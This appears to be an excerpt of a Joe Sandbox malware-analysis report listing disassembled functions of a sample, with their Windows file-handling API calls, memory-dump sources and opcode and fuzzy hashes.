                                                                                                                                                                          Function 00007FF70ECE53BC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70ECE568F
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70ECE5695
                                                                                                                                                                            • Part of subcall function 00007FF70ECD6288: FindClose.KERNELBASE(?,?,?,00007FF70ECDFFA5), ref: 00007FF70ECD62BD
                                                                                                                                                                            • Part of subcall function 00007FF70ECE1DD0: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF70ECE1E25
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$CloseFindswprintf
                                                                                                                                                                          • String ID: zip$zipx
                                                                                                                                                                          • API String ID: 2713956076-1268445101
                                                                                                                                                                          • Opcode ID: 26ff80d175eae686738a58c4fe58806cd34ce87d0909e4acf2f92a162777bad7
                                                                                                                                                                          • Instruction ID: 856a0c919d40f1848afa305fc6cf9e032d21bde93dfefde6a4de5567af7dda20
                                                                                                                                                                          • Opcode Fuzzy Hash: 26ff80d175eae686738a58c4fe58806cd34ce87d0909e4acf2f92a162777bad7
                                                                                                                                                                          • Instruction Fuzzy Hash: 4781BC62B09A0295FA00AB65EC405BDB366EF84B9CF940236DE6D177E9DF3DE441C320
                                                                                                                                                                          Function 00007FF70ECECE24 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                                          • String ID: EDIT
                                                                                                                                                                          • API String ID: 4243998846-3080729518
                                                                                                                                                                          • Opcode ID: 97649a043c3252f54d481027b362a8cb3c0219486fdf1255c1e6258ed32498fa
                                                                                                                                                                          • Instruction ID: cd4ed1c013cc831a365297d3908161b6b9ea0e4c075b42ba588014c4d12a3999
                                                                                                                                                                          • Opcode Fuzzy Hash: 97649a043c3252f54d481027b362a8cb3c0219486fdf1255c1e6258ed32498fa
                                                                                                                                                                          • Instruction Fuzzy Hash: 46016D22B18A8691FA20AB21FC217B6E390EF98744FC81031C94D47795DF2DD048C720
                                                                                                                                                                          Function 00007FF70ECD4E18 Relevance: 6.1, APIs: 4, Instructions: 136fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite$Handle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4209713984-0
                                                                                                                                                                          • Opcode ID: a08c35de12cc0ad55c2b8d3b4cac24de81053f1d764ab1386139015918f8ab8d
                                                                                                                                                                          • Instruction ID: 751c572f679a1a7c525353627fdc755bfbb2d484d5e03d87564c2f0681d2a3d0
                                                                                                                                                                          • Opcode Fuzzy Hash: a08c35de12cc0ad55c2b8d3b4cac24de81053f1d764ab1386139015918f8ab8d
                                                                                                                                                                          • Instruction Fuzzy Hash: 9351F422B1D642A2EA14EB25DC0477BE360FF44BA5F800131EB1D47A90DF3EE444C710
                                                                                                                                                                          Function 00007FF70ECE0120 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2912839123-0
                                                                                                                                                                          • Opcode ID: 52c42f635bd84e7c386a5cb6d45f56bbd2e5f0363e7f362e44c94dfc8240b572
                                                                                                                                                                          • Instruction ID: 72470c44e677d3213e44fb5612e8015e04bbe002371ecde7546d5ccbf1602f6f
                                                                                                                                                                          • Opcode Fuzzy Hash: 52c42f635bd84e7c386a5cb6d45f56bbd2e5f0363e7f362e44c94dfc8240b572
                                                                                                                                                                          • Instruction Fuzzy Hash: 77519362F24792A5FB00ABA9DC553EEA322AF44B94F900635DA5C177D5DF7ED440C320
                                                                                                                                                                          Function 00007FF70ECF653C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1452418845-0
                                                                                                                                                                          • Opcode ID: 82ea77dc686828d8d4b6b6f5dd528249c478d0f7ec0ca3c5a3cf5b807b775c11
                                                                                                                                                                          • Instruction ID: c3106fe7c1f41a36d425b1f8a537aa9f9010d884fb751c13761fb20b816fecb7
                                                                                                                                                                          • Opcode Fuzzy Hash: 82ea77dc686828d8d4b6b6f5dd528249c478d0f7ec0ca3c5a3cf5b807b775c11
                                                                                                                                                                          • Instruction Fuzzy Hash: DE313B20E0C147A5FA14BB649C623BBA291EF41384FC84535EA4E472D7DF3EF90582B0
                                                                                                                                                                          Function 00007FF70ECD5C60 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2359106489-0
                                                                                                                                                                          • Opcode ID: ffdd47a62d5d541dff0e329547613356fc3e375843f87fc9b7e700371383d697
                                                                                                                                                                          • Instruction ID: ffcb7f3e8d31cb89bce3c9dbf1f8ee5bec8b29ee936776d8da1db28d475d1395
                                                                                                                                                                          • Opcode Fuzzy Hash: ffdd47a62d5d541dff0e329547613356fc3e375843f87fc9b7e700371383d697
                                                                                                                                                                          • Instruction Fuzzy Hash: 57319526A1C742D1EB20BB25AD482BFE251FF89790FD44231EA9D436D5DF3ED4458620
                                                                                                                                                                          Function 00007FF70ECD4520 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2244327787-0
                                                                                                                                                                          • Opcode ID: 81b122369233d7b8f515bb11307ece11792f2ae8c3e4e6e271921b1ee2b41d44
                                                                                                                                                                          • Instruction ID: d5a20eb48cc97ff4563fe5e023ec2ca327f2ce8dab9b0571190866fed0f20c6c
                                                                                                                                                                          • Opcode Fuzzy Hash: 81b122369233d7b8f515bb11307ece11792f2ae8c3e4e6e271921b1ee2b41d44
                                                                                                                                                                          • Instruction Fuzzy Hash: 23216F31E0C64292EA68AF11AC4033BE7A0FF45B94F944531DB6D47688EF3FE9558760
                                                                                                                                                                          Function 00007FF70ECED0A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DirectoryInitializeMallocSystem
                                                                                                                                                                          • String ID: riched20.dll
                                                                                                                                                                          • API String ID: 174490985-3360196438
                                                                                                                                                                          • Opcode ID: 365b79f259f2d495b187002154b0899407bd3c7620a567aa1c77a60e11cfd5d3
                                                                                                                                                                          • Instruction ID: 5d1a4a317768e1442d19d895910f35689307fec87cd23f449be308b6a5c82d1f
                                                                                                                                                                          • Opcode Fuzzy Hash: 365b79f259f2d495b187002154b0899407bd3c7620a567aa1c77a60e11cfd5d3
                                                                                                                                                                          • Instruction Fuzzy Hash: 37F04F72A18B4682EB10AB60EC542AAF3A0FF84354F840235E58E42A64DFBCD558CB10
                                                                                                                                                                          Function 00007FF70ECEDAC4 Relevance: 4.6, APIs: 3, Instructions: 146COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$FileOperation
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2032784890-0
                                                                                                                                                                          • Opcode ID: 52822e37058ddecc27f569699c86d0792f62d3f64013b6b984386d0650054082
                                                                                                                                                                          • Instruction ID: 9ffc10539ccecaf1add9743d1c127c1beb26bf42a8e7b1c80103b6401b88c4df
                                                                                                                                                                          • Opcode Fuzzy Hash: 52822e37058ddecc27f569699c86d0792f62d3f64013b6b984386d0650054082
                                                                                                                                                                          • Instruction Fuzzy Hash: F8618D72B18B41E8EB00EF74C8642AD7361EF44798F804635DA5D23B99DF3AD595C320
                                                                                                                                                                          Function 00007FF70ECD4334 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2272807158-0
                                                                                                                                                                          • Opcode ID: 33f9f6c40ca51d6f515c3526a5403399e820703fc3a7be890d6b1ee693d7ae16
                                                                                                                                                                          • Instruction ID: 0ac1b9417cbfe3b8b90ffecb59797207705c36f712687903970b2c49e8a4c296
                                                                                                                                                                          • Opcode Fuzzy Hash: 33f9f6c40ca51d6f515c3526a5403399e820703fc3a7be890d6b1ee693d7ae16
                                                                                                                                                                          • Instruction Fuzzy Hash: 8541B372A1878592EB14AB15E84426AA3A1FF85BB4F944335DFBD03AD5CF3EE4908710
                                                                                                                                                                          Function 00007FF70ECD1FF8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2176759853-0
                                                                                                                                                                          • Opcode ID: 5d2bab8f51f9d314410111c7f186ae8538523e7159733306ab38017dbe6a81e0
                                                                                                                                                                          • Instruction ID: cc30bbf46bac8eda7a13e14d3c10851b2aaa1bf0c46d517dfbdb79b7cafacc2f
                                                                                                                                                                          • Opcode Fuzzy Hash: 5d2bab8f51f9d314410111c7f186ae8538523e7159733306ab38017dbe6a81e0
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C21C072A29B8591EA14AB25A84016EE360FF88BD0F944235EBDC03B99DF3DE180C700
                                                                                                                                                                          Function 00007FF70ECD5FF4 Relevance: 4.6, APIs: 3, Instructions: 62COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1203560049-0
                                                                                                                                                                          • Opcode ID: a1a2a352783569c4148b81fca6241be51c2e066d394ca70f0e015e6fb04d1bf9
                                                                                                                                                                          • Instruction ID: c8d1ff06684a5fa6da3529932d85f30f368e4343a70e716422509105279357d9
                                                                                                                                                                          • Opcode Fuzzy Hash: a1a2a352783569c4148b81fca6241be51c2e066d394ca70f0e015e6fb04d1bf9
                                                                                                                                                                          • Instruction Fuzzy Hash: 83210A23B1CB8591EA20AB24E85427FE361FF88B94F944231EBAD43694DF3EE540C614
                                                                                                                                                                          Function 00007FF70ECD5790 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3118131910-0
                                                                                                                                                                          • Opcode ID: 0ffd8ab98259af01e549e4e209d38ba10793117fd38bdfbcba967ce90f97429d
                                                                                                                                                                          • Instruction ID: 93b09588fcecc9588f5584a25f1e48857bbc96f57e25520b582ced7acabceba6
                                                                                                                                                                          • Opcode Fuzzy Hash: 0ffd8ab98259af01e549e4e209d38ba10793117fd38bdfbcba967ce90f97429d
                                                                                                                                                                          • Instruction Fuzzy Hash: AF21C522A1CB81D1EA20AB24FC5422FA360FF88BD4F904235EADD43A99DF3DD551C710
                                                                                                                                                                          Function 00007FF70ECD5890 Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1203560049-0
                                                                                                                                                                          • Opcode ID: d2d5bb6998dcaffb369a501a3cf8d8e8aac5dce102f658295e0fffcdaf9a65bf
                                                                                                                                                                          • Instruction ID: 478860500f3eab35d9fedbf42cae8529395e63ae03ccd442b035f01612fc1412
                                                                                                                                                                          • Opcode Fuzzy Hash: d2d5bb6998dcaffb369a501a3cf8d8e8aac5dce102f658295e0fffcdaf9a65bf
                                                                                                                                                                          • Instruction Fuzzy Hash: C0215632A1CB8591EA10AB28F85422EE361FF89BA4F940235EAAD43795DF3DD541C714
                                                                                                                                                                          Function 00007FF70ECFF444 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                          • Opcode ID: 0d5958cce1ab38587c529cfbb209ba956894e29a38315a5b4669c830f79dc8c5
                                                                                                                                                                          • Instruction ID: f96446f48bdd0a5dcbfa60472fa31823ad422eec8d254353bd4b20f353495576
                                                                                                                                                                          • Opcode Fuzzy Hash: 0d5958cce1ab38587c529cfbb209ba956894e29a38315a5b4669c830f79dc8c5
                                                                                                                                                                          • Instruction Fuzzy Hash: B9E04F20B0834682EF247B319C9577A6762DF84741F54583CCC4E43396CF3EE8488271
